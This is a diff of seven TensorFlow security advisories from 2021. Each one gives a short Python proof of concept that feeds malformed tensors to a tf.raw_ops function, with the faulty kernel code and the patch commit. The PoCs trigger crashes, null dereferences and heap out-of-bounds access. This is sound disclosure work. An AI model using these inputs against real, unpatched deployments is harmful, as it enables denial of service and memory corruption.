This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,38 @@
## TFSA-2021-051: `CHECK`-fail in `tf.raw_ops.RFFT`
### CVE Number
CVE-2021-29563
### Impact
An attacker can cause a denial of service by exploiting a `CHECK`-failure coming
from the implementation of `tf.raw_ops.RFFT`:
```python
import tensorflow as tf
inputs = tf.constant([1], shape=[1], dtype=tf.float32)
fft_length = tf.constant([0], shape=[1], dtype=tf.int32)
tf.raw_ops.RFFT(input=inputs, fft_length=fft_length)
```
The above example causes Eigen code to operate on an empty matrix. This triggers
on an assertion and causes program termination.
### Patches
We have patched the issue in GitHub commit
[31bd5026304677faa8a0b77602c6154171b9aec1](https://github.com/tensorflow/tensorflow/commit/31bd5026304677faa8a0b77602c6154171b9aec1).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,58 @@
## TFSA-2021-052: Null pointer dereference in `EditDistance`
### CVE Number
CVE-2021-29564
### Impact
An attacker can trigger a null pointer dereference in the implementation of
`tf.raw_ops.EditDistance`:
```python
import tensorflow as tf
hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64)
hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32)
hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64)
truth_values = tf.constant([], shape=[0], dtype=tf.float32)
truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
tf.raw_ops.EditDistance(
hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values,
hypothesis_shape=hypothesis_shape, truth_indices=truth_indices,
truth_values=truth_values, truth_shape=truth_shape, normalize=True)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/79865b542f9ffdc9caeb255631f7c56f1d4b6517/tensorflow/core/kernels/edit_distance_op.cc#L103-L159)
has incomplete validation of the input parameters.
In the above scenario, an attacker causes an allocation of an empty tensor for
the output:
```cc
OP_REQUIRES_OK(ctx, ctx->allocate_output("output", output_shape, &output));
auto output_t = output->flat<float>();
output_t.setZero();
```
Because `output_shape` has 0 elements, the result of `output->flat<T>()` has an
empty buffer, so calling `setZero` would result in a null dereference.
### Patches
We have patched the issue in GitHub commit
[f4c364a5d6880557f6f5b6eb5cee2c407f0186b3](https://github.com/tensorflow/tensorflow/commit/f4c364a5d6880557f6f5b6eb5cee2c407f0186b3).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,59 @@
## TFSA-2021-053: Null pointer dereference in `SparseFillEmptyRows`
### CVE Number
CVE-2021-29565
### Impact
An attacker can trigger a null pointer dereference in the implementation of
`tf.raw_ops.SparseFillEmptyRows`:
```python
import tensorflow as tf
indices = tf.constant([], shape=[0, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
dense_shape = tf.constant([], shape=[0], dtype=tf.int64)
default_value = 0
tf.raw_ops.SparseFillEmptyRows(
indices=indices, values=values, dense_shape=dense_shape,
default_value=default_value)
```
This is because of missing
[validation](https://github.com/tensorflow/tensorflow/blob/fdc82089d206e281c628a93771336bf87863d5e8/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L230-L231)
that was covered under a `TODO`. If the `dense_shape` tensor is empty, then
`dense_shape_t.vec<>()` would cause a null pointer dereference in the
implementation of the op:
```cc
template <typename T, typename Tindex>
struct SparseFillEmptyRows<CPUDevice, T, Tindex> {
Status operator()(OpKernelContext* context, const Tensor& default_value_t,
const Tensor& indices_t, const Tensor& values_t,
const Tensor& dense_shape_t,
typename AsyncOpKernel::DoneCallback done) {
...
const auto dense_shape = dense_shape_t.vec<Tindex>();
...
}
}
```
### Patches
We have patched the issue in GitHub commit
[faa76f39014ed3b5e2c158593b1335522e573c7f](https://github.com/tensorflow/tensorflow/commit/faa76f39014ed3b5e2c158593b1335522e573c7f).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,51 @@
## TFSA-2021-054: Heap OOB access in `Dilation2DBackpropInput`
### CVE Number
CVE-2021-29566
### Impact
An attacker can write outside the bounds of heap allocated arrays by passing
invalid arguments to `tf.raw_ops.Dilation2DBackpropInput`:
```python
import tensorflow as tf
input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32)
out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32)
tf.raw_ops.Dilation2DBackpropInput(
input=input_tensor, filter=filter, out_backprop=out_backprop,
strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/afd954e65f15aea4d438d0a219136fc4a63a573d/tensorflow/core/kernels/dilation_ops.cc#L321-L322)
does not validate before writing to the output array.
```cc
in_backprop(b, h_in_max, w_in_max, d) += out_backprop(b, h_out, w_out, d);
```
The values for `h_out` and `w_out` are guaranteed to be in range for
`out_backprop` (as they are loop indices bounded by the size of the array).
However, there are no similar guarantees relating `h_in_max`/`w_in_max` and
`in_backprop`.
### Patches
We have patched the issue in GitHub commit
[3f6fe4dfef6f57e768260b48166c27d148f3015f](https://github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,49 @@
## TFSA-2021-055: Reference binding to null in `ParameterizedTruncatedNormal`
### CVE Number
CVE-2021-29568
### Impact
An attacker can trigger undefined behavior by binding to null pointer in
`tf.raw_ops.ParameterizedTruncatedNormal`:
```python
import tensorflow as tf
shape = tf.constant([], shape=[0], dtype=tf.int32)
means = tf.constant((1), dtype=tf.float32)
stdevs = tf.constant((1), dtype=tf.float32)
minvals = tf.constant((1), dtype=tf.float32)
maxvals = tf.constant((1), dtype=tf.float32)
tf.raw_ops.ParameterizedTruncatedNormal(
shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/3f6fe4dfef6f57e768260b48166c27d148f3015f/tensorflow/core/kernels/parameterized_truncated_normal_op.cc#L630)
does not validate input arguments before accessing the first element of `shape`:
```cc
int32 num_batches = shape_tensor.flat<int32>()(0);
```
If `shape` argument is empty, then `shape_tensor.flat<T>()` is an empty array.
### Patches
We have patched the issue in GitHub commit
[5e52ef5a461570cfb68f3bdbbebfe972cb4e0fd8](https://github.com/tensorflow/tensorflow/commit/5e52ef5a461570cfb68f3bdbbebfe972cb4e0fd8).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,48 @@
## TFSA-2021-056: Lack of validation in `SparseDenseCwiseMul`
### CVE Number
CVE-2021-29567
### Impact
Due to lack of validation in `tf.raw_ops.SparseDenseCwiseMul`, an attacker can
trigger denial of service via `CHECK`-fails or accesses to outside the bounds of
heap allocated data:
```python
import tensorflow as tf
indices = tf.constant([], shape=[10, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
shape = tf.constant([0, 0], shape=[2], dtype=tf.int64)
dense = tf.constant([], shape=[0], dtype=tf.int64)
tf.raw_ops.SparseDenseCwiseMul(
sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
```
Since the
[implementation](https://github.com/tensorflow/tensorflow/blob/38178a2f7a681a7835bb0912702a134bfe3b4d84/tensorflow/core/kernels/sparse_dense_binary_op_shared.cc#L68-L80)
only validates the rank of the input arguments but no [constraints between
dimensions](https://www.tensorflow.org/api_docs/python/tf/raw_ops/SparseDenseCwiseMul),
an attacker can abuse them to trigger internal `CHECK` assertions (and cause
program termination, denial of service) or to write to memory outside of bounds
of heap allocated tensor buffers.
### Patches
We have patched the issue in GitHub commit
[7ae2af34087fb4b5c8915279efd03da3b81028bc](https://github.com/tensorflow/tensorflow/commit/7ae2af34087fb4b5c8915279efd03da3b81028bc).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,50 @@
## TFSA-2021-057: Heap out of bounds read in `MaxPoolGradWithArgmax`
### CVE Number
CVE-2021-29570
### Impact
The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside
of bounds of heap allocated data if attacker supplies specially crafted inputs:
```python
import tensorflow as tf
input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32)
grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32)
argmax = tf.constant([1], shape=[1], dtype=tf.int64)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
tf.raw_ops.MaxPoolGradWithArgmax(
input=input,
grad=grad,
argmax=argmax,
ksize=ksize,
strides=strides,
padding='SAME',
include_batch_in_index=False)
```
The
[implementation](https://github.com/tensorflow/tensorflow/blob/ef0c008ee84bad91ec6725ddc42091e19a30cf0e/tensorflow/core/kernels/maxpooling_op.cc#L1016-L1017)
uses the same value to index in two different arrays but there is no guarantee
that the sizes are identical.
### Patches
We have patched the issue in GitHub commit
[dcd7867de0fea4b72a2b34bd41eb74548dc23886](https://github.com/tensorflow/tensorflow/commit/dcd7867de0fea4b72a2b34bd41eb74548dc23886).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.

Some files were not shown because too many files have changed in this diff Show More